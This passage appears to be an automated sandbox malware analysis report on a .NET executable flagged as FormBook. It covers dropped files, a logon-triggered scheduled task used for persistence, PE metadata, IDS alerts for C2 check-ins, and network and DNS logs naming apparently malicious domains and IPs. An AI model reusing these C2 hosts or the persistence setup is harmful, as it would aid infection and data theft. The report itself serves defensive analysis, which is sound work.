Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

C:\Users\user\AppData\Roaming\HpnpObXJP.exe Download File
Process:	C:\Users\user\Desktop\tgamf4XuLa.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	548352
Entropy (8bit):	7.150010822520698
Encrypted:	false
SSDEEP:	12288:MWHCM2K4C2+XhqZ5G8n1wI1Sazqyjxg5QLN:83C2+xqm8l9zqyFgiL
MD5:	F8146A71DEDC3EEEAA1624D6832C39A4
SHA1:	B1007A3BEAB21C77513BB9C4E6FC2A04C6346C04
SHA-256:	3611C1A2E9D1897825D5E7100A1C01D807F62A9C75D5F12602C168B0726D56CA
SHA-512:	EB4D38153E98FB9744B2AB9496E8A084E83C0202639823B2DE5FCDA7609221918D2615AD572F007C0F4A62D363E2362936B585BE1E09462FA299DFAC69FC2654
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p................0..T...........r... ........@.. ....................................@.................................pr..O...................................Tr............................................... ............... ..H............text....R... ...T.................. ..`.rsrc................V..............@..@.reloc...............\..............@..B.................r......H........?...^......o...L...............................................~..$}......}......}.....(.........$}......}......}.....(........}......}.......0..O.........$}......}......}.....(........{....}......{....}......{....}......{....}....:..{....(........0..w..........R.{........,f.r...p(....-).r!..p(....-%.r-..p(....-%.r9..p(....-%+0..}....+'..J.{....XT+...J.{....XT+...J.{....XT+...0...........rE..p.+....0...........ro..p.+....0..................+..".(.....*....0..

C:\Users\user\AppData\Roaming\HpnpObXJP.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\tgamf4XuLa.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.150010822520698
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	tgamf4XuLa.exe
File size:	548352
MD5:	f8146a71dedc3eeeaa1624d6832c39a4
SHA1:	b1007a3beab21c77513bb9c4e6fc2a04c6346c04
SHA256:	3611c1a2e9d1897825d5e7100a1c01d807f62a9c75d5f12602c168b0726d56ca
SHA512:	eb4d38153e98fb9744b2ab9496e8a084e83c0202639823b2de5fcda7609221918d2615ad572f007c0f4a62d363e2362936b585be1e09462fa299dfac69fc2654
SSDEEP:	12288:MWHCM2K4C2+XhqZ5G8n1wI1Sazqyjxg5QLN:83C2+xqm8l9zqyFgiL
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p................0..T...........r... ........@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x4872c2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x960770CE [Tue Oct 5 18:07:10 2049 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x87270	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x88000	0x5a4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x87254	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x852c8	0x85400	False	0.75722986046	data	7.16093944862	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x88000	0x5a4	0x600	False	0.419270833333	data	4.05521631132	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8a000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x88090	0x314	data
RT_MANIFEST	0x883b4	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2019
Assembly Version	1.0.0.0
InternalName	Formatt.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	Disciples
ProductVersion	1.0.0.0
FileDescription	Disciples
OriginalFilename	Formatt.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/15/21-10:09:58.335857	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49780	80	192.168.2.3	52.25.92.0
09/15/21-10:09:58.335857	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49780	80	192.168.2.3	52.25.92.0
09/15/21-10:09:58.335857	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49780	80	192.168.2.3	52.25.92.0
09/15/21-10:10:03.777625	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49781	99.83.154.118	192.168.2.3
09/15/21-10:10:08.965113	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49782	34.98.99.30	192.168.2.3
09/15/21-10:10:14.181255	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49787	34.98.99.30	192.168.2.3
09/15/21-10:10:30.286043	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49790	80	192.168.2.3	34.102.136.180
09/15/21-10:10:30.286043	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49790	80	192.168.2.3	34.102.136.180
09/15/21-10:10:30.286043	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49790	80	192.168.2.3	34.102.136.180
09/15/21-10:10:30.401585	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49790	34.102.136.180	192.168.2.3
09/15/21-10:10:40.511246	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49791	80	192.168.2.3	99.83.154.118
09/15/21-10:10:40.511246	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49791	80	192.168.2.3	99.83.154.118
09/15/21-10:10:40.511246	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49791	80	192.168.2.3	99.83.154.118
09/15/21-10:10:40.680718	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49791	99.83.154.118	192.168.2.3
09/15/21-10:10:45.754266	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49792	80	192.168.2.3	34.98.99.30
09/15/21-10:10:45.754266	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49792	80	192.168.2.3	34.98.99.30
09/15/21-10:10:45.754266	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49792	80	192.168.2.3	34.98.99.30
09/15/21-10:10:45.871161	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49792	34.98.99.30	192.168.2.3
09/15/21-10:10:50.931049	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49793	80	192.168.2.3	91.195.240.94
09/15/21-10:10:50.931049	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49793	80	192.168.2.3	91.195.240.94
09/15/21-10:10:50.931049	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49793	80	192.168.2.3	91.195.240.94

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 15, 2021 10:09:58.142708063 CEST	49780	80	192.168.2.3	52.25.92.0
Sep 15, 2021 10:09:58.335076094 CEST	80	49780	52.25.92.0	192.168.2.3
Sep 15, 2021 10:09:58.335562944 CEST	49780	80	192.168.2.3	52.25.92.0
Sep 15, 2021 10:09:58.335856915 CEST	49780	80	192.168.2.3	52.25.92.0
Sep 15, 2021 10:09:58.520380974 CEST	80	49780	52.25.92.0	192.168.2.3
Sep 15, 2021 10:09:58.520955086 CEST	80	49780	52.25.92.0	192.168.2.3
Sep 15, 2021 10:09:58.520979881 CEST	80	49780	52.25.92.0	192.168.2.3
Sep 15, 2021 10:09:58.521400928 CEST	80	49780	52.25.92.0	192.168.2.3
Sep 15, 2021 10:09:58.524154902 CEST	49780	80	192.168.2.3	52.25.92.0
Sep 15, 2021 10:09:58.524269104 CEST	49780	80	192.168.2.3	52.25.92.0
Sep 15, 2021 10:09:58.708976984 CEST	80	49780	52.25.92.0	192.168.2.3
Sep 15, 2021 10:10:03.599700928 CEST	49781	80	192.168.2.3	99.83.154.118
Sep 15, 2021 10:10:03.618251085 CEST	80	49781	99.83.154.118	192.168.2.3
Sep 15, 2021 10:10:03.618488073 CEST	49781	80	192.168.2.3	99.83.154.118
Sep 15, 2021 10:10:03.618793011 CEST	49781	80	192.168.2.3	99.83.154.118
Sep 15, 2021 10:10:03.637415886 CEST	80	49781	99.83.154.118	192.168.2.3
Sep 15, 2021 10:10:03.777625084 CEST	80	49781	99.83.154.118	192.168.2.3
Sep 15, 2021 10:10:03.777683973 CEST	80	49781	99.83.154.118	192.168.2.3
Sep 15, 2021 10:10:03.779618979 CEST	49781	80	192.168.2.3	99.83.154.118
Sep 15, 2021 10:10:03.779794931 CEST	49781	80	192.168.2.3	99.83.154.118
Sep 15, 2021 10:10:03.800842047 CEST	80	49781	99.83.154.118	192.168.2.3
Sep 15, 2021 10:10:08.829628944 CEST	49782	80	192.168.2.3	34.98.99.30
Sep 15, 2021 10:10:08.848478079 CEST	80	49782	34.98.99.30	192.168.2.3
Sep 15, 2021 10:10:08.849801064 CEST	49782	80	192.168.2.3	34.98.99.30
Sep 15, 2021 10:10:08.849975109 CEST	49782	80	192.168.2.3	34.98.99.30
Sep 15, 2021 10:10:08.868742943 CEST	80	49782	34.98.99.30	192.168.2.3
Sep 15, 2021 10:10:08.965112925 CEST	80	49782	34.98.99.30	192.168.2.3
Sep 15, 2021 10:10:08.965140104 CEST	80	49782	34.98.99.30	192.168.2.3
Sep 15, 2021 10:10:08.965301991 CEST	49782	80	192.168.2.3	34.98.99.30
Sep 15, 2021 10:10:08.965415001 CEST	49782	80	192.168.2.3	34.98.99.30
Sep 15, 2021 10:10:09.265618086 CEST	49782	80	192.168.2.3	34.98.99.30
Sep 15, 2021 10:10:09.284578085 CEST	80	49782	34.98.99.30	192.168.2.3
Sep 15, 2021 10:10:14.041023016 CEST	49787	80	192.168.2.3	34.98.99.30
Sep 15, 2021 10:10:14.065136909 CEST	80	49787	34.98.99.30	192.168.2.3
Sep 15, 2021 10:10:14.065464973 CEST	49787	80	192.168.2.3	34.98.99.30
Sep 15, 2021 10:10:14.066011906 CEST	49787	80	192.168.2.3	34.98.99.30
Sep 15, 2021 10:10:14.085696936 CEST	80	49787	34.98.99.30	192.168.2.3
Sep 15, 2021 10:10:14.181255102 CEST	80	49787	34.98.99.30	192.168.2.3
Sep 15, 2021 10:10:14.181319952 CEST	80	49787	34.98.99.30	192.168.2.3
Sep 15, 2021 10:10:14.181651115 CEST	49787	80	192.168.2.3	34.98.99.30
Sep 15, 2021 10:10:14.181672096 CEST	49787	80	192.168.2.3	34.98.99.30
Sep 15, 2021 10:10:14.484749079 CEST	49787	80	192.168.2.3	34.98.99.30
Sep 15, 2021 10:10:14.503680944 CEST	80	49787	34.98.99.30	192.168.2.3
Sep 15, 2021 10:10:19.233666897 CEST	49788	80	192.168.2.3	91.195.240.94
Sep 15, 2021 10:10:19.252449989 CEST	80	49788	91.195.240.94	192.168.2.3
Sep 15, 2021 10:10:19.252635002 CEST	49788	80	192.168.2.3	91.195.240.94
Sep 15, 2021 10:10:19.252830982 CEST	49788	80	192.168.2.3	91.195.240.94
Sep 15, 2021 10:10:19.272996902 CEST	80	49788	91.195.240.94	192.168.2.3
Sep 15, 2021 10:10:19.290005922 CEST	80	49788	91.195.240.94	192.168.2.3
Sep 15, 2021 10:10:19.290040016 CEST	80	49788	91.195.240.94	192.168.2.3
Sep 15, 2021 10:10:19.290277958 CEST	49788	80	192.168.2.3	91.195.240.94
Sep 15, 2021 10:10:19.290385962 CEST	49788	80	192.168.2.3	91.195.240.94
Sep 15, 2021 10:10:19.310718060 CEST	80	49788	91.195.240.94	192.168.2.3
Sep 15, 2021 10:10:24.503412008 CEST	49789	80	192.168.2.3	103.72.144.19
Sep 15, 2021 10:10:24.817097902 CEST	80	49789	103.72.144.19	192.168.2.3
Sep 15, 2021 10:10:24.817893982 CEST	49789	80	192.168.2.3	103.72.144.19
Sep 15, 2021 10:10:24.818169117 CEST	49789	80	192.168.2.3	103.72.144.19
Sep 15, 2021 10:10:25.132307053 CEST	80	49789	103.72.144.19	192.168.2.3
Sep 15, 2021 10:10:25.132343054 CEST	80	49789	103.72.144.19	192.168.2.3
Sep 15, 2021 10:10:25.132352114 CEST	80	49789	103.72.144.19	192.168.2.3
Sep 15, 2021 10:10:25.135516882 CEST	49789	80	192.168.2.3	103.72.144.19
Sep 15, 2021 10:10:25.135601997 CEST	49789	80	192.168.2.3	103.72.144.19
Sep 15, 2021 10:10:25.454338074 CEST	80	49789	103.72.144.19	192.168.2.3
Sep 15, 2021 10:10:30.264316082 CEST	49790	80	192.168.2.3	34.102.136.180
Sep 15, 2021 10:10:30.285715103 CEST	80	49790	34.102.136.180	192.168.2.3
Sep 15, 2021 10:10:30.285825014 CEST	49790	80	192.168.2.3	34.102.136.180
Sep 15, 2021 10:10:30.286042929 CEST	49790	80	192.168.2.3	34.102.136.180
Sep 15, 2021 10:10:30.310519934 CEST	80	49790	34.102.136.180	192.168.2.3
Sep 15, 2021 10:10:30.401585102 CEST	80	49790	34.102.136.180	192.168.2.3
Sep 15, 2021 10:10:30.401640892 CEST	80	49790	34.102.136.180	192.168.2.3
Sep 15, 2021 10:10:30.401880026 CEST	49790	80	192.168.2.3	34.102.136.180
Sep 15, 2021 10:10:30.401911974 CEST	49790	80	192.168.2.3	34.102.136.180
Sep 15, 2021 10:10:30.707046032 CEST	49790	80	192.168.2.3	34.102.136.180
Sep 15, 2021 10:10:30.726382971 CEST	80	49790	34.102.136.180	192.168.2.3
Sep 15, 2021 10:10:40.488914013 CEST	49791	80	192.168.2.3	99.83.154.118
Sep 15, 2021 10:10:40.510979891 CEST	80	49791	99.83.154.118	192.168.2.3
Sep 15, 2021 10:10:40.511141062 CEST	49791	80	192.168.2.3	99.83.154.118
Sep 15, 2021 10:10:40.511245966 CEST	49791	80	192.168.2.3	99.83.154.118
Sep 15, 2021 10:10:40.532310963 CEST	80	49791	99.83.154.118	192.168.2.3
Sep 15, 2021 10:10:40.680717945 CEST	80	49791	99.83.154.118	192.168.2.3
Sep 15, 2021 10:10:40.680741072 CEST	80	49791	99.83.154.118	192.168.2.3
Sep 15, 2021 10:10:40.681369066 CEST	49791	80	192.168.2.3	99.83.154.118
Sep 15, 2021 10:10:40.681411982 CEST	49791	80	192.168.2.3	99.83.154.118
Sep 15, 2021 10:10:40.697202921 CEST	80	49791	99.83.154.118	192.168.2.3
Sep 15, 2021 10:10:40.700391054 CEST	49791	80	192.168.2.3	99.83.154.118
Sep 15, 2021 10:10:40.705658913 CEST	80	49791	99.83.154.118	192.168.2.3
Sep 15, 2021 10:10:45.731671095 CEST	49792	80	192.168.2.3	34.98.99.30
Sep 15, 2021 10:10:45.753977060 CEST	80	49792	34.98.99.30	192.168.2.3
Sep 15, 2021 10:10:45.754204988 CEST	49792	80	192.168.2.3	34.98.99.30
Sep 15, 2021 10:10:45.754266024 CEST	49792	80	192.168.2.3	34.98.99.30
Sep 15, 2021 10:10:45.773391962 CEST	80	49792	34.98.99.30	192.168.2.3
Sep 15, 2021 10:10:45.871160984 CEST	80	49792	34.98.99.30	192.168.2.3
Sep 15, 2021 10:10:45.872540951 CEST	49792	80	192.168.2.3	34.98.99.30
Sep 15, 2021 10:10:45.872602940 CEST	80	49792	34.98.99.30	192.168.2.3
Sep 15, 2021 10:10:45.872720003 CEST	49792	80	192.168.2.3	34.98.99.30
Sep 15, 2021 10:10:45.891458988 CEST	80	49792	34.98.99.30	192.168.2.3
Sep 15, 2021 10:10:50.911632061 CEST	49793	80	192.168.2.3	91.195.240.94
Sep 15, 2021 10:10:50.930871964 CEST	80	49793	91.195.240.94	192.168.2.3
Sep 15, 2021 10:10:50.930979013 CEST	49793	80	192.168.2.3	91.195.240.94
Sep 15, 2021 10:10:50.931049109 CEST	49793	80	192.168.2.3	91.195.240.94
Sep 15, 2021 10:10:50.949721098 CEST	80	49793	91.195.240.94	192.168.2.3
Sep 15, 2021 10:10:50.960297108 CEST	80	49793	91.195.240.94	192.168.2.3
Sep 15, 2021 10:10:50.960315943 CEST	80	49793	91.195.240.94	192.168.2.3
Sep 15, 2021 10:10:50.960495949 CEST	49793	80	192.168.2.3	91.195.240.94
Sep 15, 2021 10:10:50.960520029 CEST	49793	80	192.168.2.3	91.195.240.94
Sep 15, 2021 10:10:50.979151964 CEST	80	49793	91.195.240.94	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 15, 2021 10:08:25.316128016 CEST	50620	53	192.168.2.3	8.8.8.8
Sep 15, 2021 10:08:25.350845098 CEST	53	50620	8.8.8.8	192.168.2.3
Sep 15, 2021 10:08:52.204672098 CEST	64938	53	192.168.2.3	8.8.8.8
Sep 15, 2021 10:08:52.235321045 CEST	53	64938	8.8.8.8	192.168.2.3
Sep 15, 2021 10:08:57.434880018 CEST	60152	53	192.168.2.3	8.8.8.8
Sep 15, 2021 10:08:57.477111101 CEST	53	60152	8.8.8.8	192.168.2.3
Sep 15, 2021 10:09:18.122143984 CEST	57544	53	192.168.2.3	8.8.8.8
Sep 15, 2021 10:09:18.162800074 CEST	53	57544	8.8.8.8	192.168.2.3
Sep 15, 2021 10:09:23.468075037 CEST	55984	53	192.168.2.3	8.8.8.8
Sep 15, 2021 10:09:23.512341022 CEST	53	55984	8.8.8.8	192.168.2.3
Sep 15, 2021 10:09:35.609021902 CEST	64185	53	192.168.2.3	8.8.8.8
Sep 15, 2021 10:09:35.639624119 CEST	53	64185	8.8.8.8	192.168.2.3
Sep 15, 2021 10:09:57.940447092 CEST	65110	53	192.168.2.3	8.8.8.8
Sep 15, 2021 10:09:58.132829905 CEST	53	65110	8.8.8.8	192.168.2.3
Sep 15, 2021 10:10:03.536367893 CEST	58361	53	192.168.2.3	8.8.8.8
Sep 15, 2021 10:10:03.597603083 CEST	53	58361	8.8.8.8	192.168.2.3
Sep 15, 2021 10:10:08.785339117 CEST	63492	53	192.168.2.3	8.8.8.8
Sep 15, 2021 10:10:08.826334000 CEST	53	63492	8.8.8.8	192.168.2.3
Sep 15, 2021 10:10:10.227674961 CEST	60831	53	192.168.2.3	8.8.8.8
Sep 15, 2021 10:10:10.265500069 CEST	53	60831	8.8.8.8	192.168.2.3
Sep 15, 2021 10:10:11.977534056 CEST	60100	53	192.168.2.3	8.8.8.8
Sep 15, 2021 10:10:12.013201952 CEST	53	60100	8.8.8.8	192.168.2.3
Sep 15, 2021 10:10:14.004148006 CEST	53195	53	192.168.2.3	8.8.8.8
Sep 15, 2021 10:10:14.038501024 CEST	53	53195	8.8.8.8	192.168.2.3
Sep 15, 2021 10:10:19.195137978 CEST	50141	53	192.168.2.3	8.8.8.8
Sep 15, 2021 10:10:19.232110977 CEST	53	50141	8.8.8.8	192.168.2.3
Sep 15, 2021 10:10:24.317293882 CEST	53023	53	192.168.2.3	8.8.8.8
Sep 15, 2021 10:10:24.501940012 CEST	53	53023	8.8.8.8	192.168.2.3
Sep 15, 2021 10:10:30.179683924 CEST	49563	53	192.168.2.3	8.8.8.8
Sep 15, 2021 10:10:30.254374981 CEST	53	49563	8.8.8.8	192.168.2.3
Sep 15, 2021 10:10:40.425901890 CEST	51352	53	192.168.2.3	8.8.8.8
Sep 15, 2021 10:10:40.488056898 CEST	53	51352	8.8.8.8	192.168.2.3
Sep 15, 2021 10:10:45.692493916 CEST	59349	53	192.168.2.3	8.8.8.8
Sep 15, 2021 10:10:45.730973005 CEST	53	59349	8.8.8.8	192.168.2.3
Sep 15, 2021 10:10:50.880100965 CEST	57084	53	192.168.2.3	8.8.8.8
Sep 15, 2021 10:10:50.911007881 CEST	53	57084	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 15, 2021 10:09:57.940447092 CEST	192.168.2.3	8.8.8.8	0xf5c4	Standard query (0)	www.cherrybunk.life	A (IP address)	IN (0x0001)
Sep 15, 2021 10:10:03.536367893 CEST	192.168.2.3	8.8.8.8	0x1fab	Standard query (0)	www.d0berman245.xyz	A (IP address)	IN (0x0001)
Sep 15, 2021 10:10:08.785339117 CEST	192.168.2.3	8.8.8.8	0x85e0	Standard query (0)	www.fraktal.media	A (IP address)	IN (0x0001)
Sep 15, 2021 10:10:14.004148006 CEST	192.168.2.3	8.8.8.8	0xd94	Standard query (0)	www.expertexceleratorchallenge.com	A (IP address)	IN (0x0001)
Sep 15, 2021 10:10:19.195137978 CEST	192.168.2.3	8.8.8.8	0xeaa	Standard query (0)	www.hellocharmaine.com	A (IP address)	IN (0x0001)
Sep 15, 2021 10:10:24.317293882 CEST	192.168.2.3	8.8.8.8	0xd2e9	Standard query (0)	www.syzhtr.com	A (IP address)	IN (0x0001)
Sep 15, 2021 10:10:30.179683924 CEST	192.168.2.3	8.8.8.8	0x5b41	Standard query (0)	www.tjandamber.com	A (IP address)	IN (0x0001)
Sep 15, 2021 10:10:40.425901890 CEST	192.168.2.3	8.8.8.8	0x36e1	Standard query (0)	www.realstylecelebz.com	A (IP address)	IN (0x0001)
Sep 15, 2021 10:10:45.692493916 CEST	192.168.2.3	8.8.8.8	0x881b	Standard query (0)	www.dressmids.com	A (IP address)	IN (0x0001)
Sep 15, 2021 10:10:50.880100965 CEST	192.168.2.3	8.8.8.8	0x1a3f	Standard query (0)	www.discomountainkombucha.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 15, 2021 10:09:58.132829905 CEST	8.8.8.8	192.168.2.3	0xf5c4	No error (0)	www.cherrybunk.life		52.25.92.0	A (IP address)	IN (0x0001)
Sep 15, 2021 10:10:03.597603083 CEST	8.8.8.8	192.168.2.3	0x1fab	No error (0)	www.d0berman245.xyz		99.83.154.118	A (IP address)	IN (0x0001)
Sep 15, 2021 10:10:08.826334000 CEST	8.8.8.8	192.168.2.3	0x85e0	No error (0)	www.fraktal.media	fraktal.media		CNAME (Canonical name)	IN (0x0001)
Sep 15, 2021 10:10:08.826334000 CEST	8.8.8.8	192.168.2.3	0x85e0	No error (0)	fraktal.media		34.98.99.30	A (IP address)	IN (0x0001)
Sep 15, 2021 10:10:14.038501024 CEST	8.8.8.8	192.168.2.3	0xd94	No error (0)	www.expertexceleratorchallenge.com	expertexceleratorchallenge.com		CNAME (Canonical name)	IN (0x0001)
Sep 15, 2021 10:10:14.038501024 CEST	8.8.8.8	192.168.2.3	0xd94	No error (0)	expertexceleratorchallenge.com		34.98.99.30	A (IP address)	IN (0x0001)
Sep 15, 2021 10:10:19.232110977 CEST	8.8.8.8	192.168.2.3	0xeaa	No error (0)	www.hellocharmaine.com		91.195.240.94	A (IP address)	IN (0x0001)
Sep 15, 2021 10:10:24.501940012 CEST	8.8.8.8	192.168.2.3	0xd2e9	No error (0)	www.syzhtr.com		103.72.144.19	A (IP address)	IN (0x0001)
Sep 15, 2021 10:10:30.254374981 CEST	8.8.8.8	192.168.2.3	0x5b41	No error (0)	www.tjandamber.com	tjandamber.com		CNAME (Canonical name)	IN (0x0001)
Sep 15, 2021 10:10:30.254374981 CEST	8.8.8.8	192.168.2.3	0x5b41	No error (0)	tjandamber.com		34.102.136.180	A (IP address)	IN (0x0001)
Sep 15, 2021 10:10:40.488056898 CEST	8.8.8.8	192.168.2.3	0x36e1	No error (0)	www.realstylecelebz.com		99.83.154.118	A (IP address)	IN (0x0001)
Sep 15, 2021 10:10:45.730973005 CEST	8.8.8.8	192.168.2.3	0x881b	No error (0)	www.dressmids.com	dressmids.com		CNAME (Canonical name)	IN (0x0001)
Sep 15, 2021 10:10:45.730973005 CEST	8.8.8.8	192.168.2.3	0x881b	No error (0)	dressmids.com		34.98.99.30	A (IP address)	IN (0x0001)
